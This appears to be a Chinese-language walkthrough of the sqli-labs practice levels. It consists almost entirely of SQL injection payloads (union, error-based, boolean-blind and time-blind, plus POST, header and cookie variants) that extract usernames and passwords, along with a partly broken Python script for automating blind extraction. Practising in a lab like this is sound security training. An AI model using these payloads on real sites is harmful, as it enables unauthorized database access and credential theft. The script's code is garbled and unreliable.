找到注入点闭合后查列数: ?id=1' order by 3--+ 闭合后查库(security): -1' union select 1,database(),3--+ 查表: -1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+ 查列: -1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+ 查数据: ?id=-1' union select 1,2,group_concat(username ,'~', password) from users--+
Less-2
数字型union注入(单引号)
1 2 3 4 5 6 7 8 9 10
找到注入点后查列数: ?id=1 order by 3 闭合后查库: ?id=-1 union select 1,database(),3 查表: ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' 查列: ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' 查数据: ?id=-1 union select 1,2,group_concat(username ,'~', password) from users
Less-3
字符型union注入(单引号括号)
同理:
1 2 3 4 5 6 7
?id=1')--+ ?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),version()--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1') union select 1,2,group_concat(username ,'~', password) from users--+
Less-4
字符型union注入(双引号括号)
同理:
1 2 3 4 5
?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,`~`, password) from users--+
Less-5
单引号闭合,报错注入(无数据回显,有报错回显,这里本人用一下报错注入)
1 2 3 4 5 6 7 8
闭合后查库: ?id=1'and extractvalue(1, concat(0x7e,(select database()))) --+ 查表: ?id=1'and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ 查列: ?id=1'and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ 查数据: ?id=1'and extractvalue(1, concat('~',(select group_concat(username ,'~', password) from users)))--+
Less-6
双引号闭合,报错注入(方法同上)
1 2 3 4
?id=1''and extractvalue(1, concat(0x7e,(select database()))) --+ ?id=1''and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+ ?id=1''and extractvalue(1, concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ ?id=1''and extractvalue(1, concat('~',(select group_concat(username ,'~', password) from users)))--+
Less-7
'))闭合,布尔盲注(无数据回显,无报错回显,只能盲注,这里本人用一下布尔盲注)
过程:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
判断库名长度: ?id=1')) and length((select database()))>9--+ 依次爆库名: ?id=1')) and ascii(substr((select database()),1,1))=115--+。 判断表名长度: ?id=1')) and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+ 依次爆表名: ?id=1')) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+ 判断列名长度: ?id=1')) and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+ 依次爆列名: ?id=1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+ 判断数据内容长度: ?id=1')) and length((select group_concat(username,password) from users))>109--+ 依次爆数据内容 ?id=1')) and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
s = requests.session() url = input("请输入url:") payloads = 'abcdefghijklmnopqrstuvwxyz1234567890'#mysql字母不区分大小写,所以不用加入大写字母,还有各种符号,可以自由添加 headers = {'cookie':''}#需要登陆的可以在这里加入cookies #爆破数据库的长度 for l inrange(1,50):#这里用来爆破库的长度,非必须,可以将爆破库名时的循环设置的长一点,大于正常库名长度 databaseLen_payload = '?id=1\' and length(database())= '+str(l) + ' %23&Submit=Submit#'#将#和\号使用url编码,在#号后将完整的url拼接起来 if''in s.get(url+databaseLen_payload,headers=headers).text:# 这里面写入判断布尔型存在的根据 databaseLen =l break print('database_lenth: '+str(databaseLen))
#爆破数据库的名 database_name = ''# for l inrange(1,databaseLen+1): for i in payloads: database_payload = '?id=1\' and substr(database(),'+str(i)+'\' %23&Submit=Submit#'#拼接完整的url if''in s.get(url+database_payload, headers=headers).text: database_name += i print('database_name:'+database_name)
#爆破表的个数 for l inrange(1,50): tableNum_payload = '?id=1\'and(select count(table_name) from information_schema.tables where table_schema=database())='+str(j)+' %23&Submit=Submit#' if''in s.get(url+tableNum_payload,headers=headers).text: tableNum =l break print('tableNum:'+str(tableNum))
#爆出所有的表名 #先爆出表名的长度 for l inrange(0,tableNum): table_name = '' for i inrange(1,50): tableLen_payload = '?id=1\' and length(substr((select table_name form information_schema.tables where tale_schema=database() limit ' +str(l) +',1),1))=' +str(i) +' %23&Submit = Submit#' # 用法substr('This is a test', 6) 返回'is a test' if''in s.get(url+tableLen_payload, headers=headers).text: tableLen = i print('table'+str(j+1)+'_length: '+str(tableLen)) # (2)内部循环爆破每个表的表名 for m inrange(1,tableLen+1): for n in payloads: # i在上个循环用过了 table_payload = '?id=1\' and substr((select table_name from information_schema.tables where table_schema=database() limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url+table_payload, headers=headers).text: table_name += n print('table'+str(j+1)+'_name: '+table_name)
#根据上个脚本获得的结果,来跑对应表中的字段
s =requests.session() #保持会话
#判断表中的字段数目 columnNum = 0 for l inrange(50): columnNum_payload = '?id=1\' and(select count(column_name)from information_schema.columns where table_name = \ '') = 'str(l)+'%23&Submit = Submit' if''in s.get(url+columnNum_payload,headers=headers).text: columnNum = l break print('columnNum:'+str(columnNum))
#爆出每个字段的长度 for l inrange(0,columnNum): column_name = '' for i inrange(1,50): columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str( j) + ',1),1))=' + str(i) + ' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url + columnLen_payload, headers=headers).text: columnLen = i print('column' + str(j + 1) + '_length: ' + str(columnLen))
# (2)内部循环爆破每个表的表名 for m inrange(1, columnLen + 1): for n in payloads: # i在上个循环用过了 column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'flagishere\' limit ' + str( j) + ',1),' + str(m) + ',1)=\'' + str(n) + '\' %23&Submit=Submit#' if'User ID exists in the database.'in s.get(url + column_payload, headers=headers).text: column_name += n print('column' + str(j + 1) + '_name: ' + column_name)
Less-8
'闭合,布尔盲注
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
判断库名长度: ?id=1' and length((select database()))>9--+ 依次爆库名: ?id=1' and ascii(substr((select database()),1,1))=115--+。 判断表名长度: ?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+ 依次爆表名: ?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+ 判断列名长度: ?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+ 依次爆列名: ?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+ 判断数据内容长度: ?id=1' and length((select group_concat(username,password) from users))>109--+ 依次爆数据内容: ?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+
Less-9
'闭合,时间盲注
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
判断库名长度: ?id=1' and if(length((select database()))>9,sleep(5),1)--+ 依次爆库名: ?id=1' and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 判断表名长度: ?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 依次爆表名: ?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 判断列名长度: ?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 依次爆列名: ?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 判断数据内容长度: ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 依次爆数据内容: ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
Less-10
''闭合,时间盲注(方法同上)
Less-11
POST型注入,'闭合(需用#注释)
1 2
1' or 1=1 #判断是否存在sql注入。 1' union select 1,2#
接下来正常union联合注入
Less-12
POST型注入,")闭合
1 2
1" ) or 1=1 #判断是否存在sql注入。 1" ) union select 1,2#
接下来正常union联合注入
Less-13
POST型注入,'闭合
接下来正常union联合注入
Less-14
POST型注入,"闭合
接下来正常union联合注入
Less-15
POST型注入,'闭合,无回显
接下来正常布尔盲注
Less-16
POST型注入,")闭合,无回显
接下来正常布尔盲注
Less-17
POST型报错注入,'闭合
经测试在密码框注入
uname=admin&passwd=6666' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '&submit=Submit
Less-18
请求头(UA)报错注入,'闭合
Less-19
请求头(Referer)报错注入,'闭合
Less-20
请求头(Cookie)报错注入,'闭合
Cookie: uname=' union select 1,database(),3 or 1=1 #;
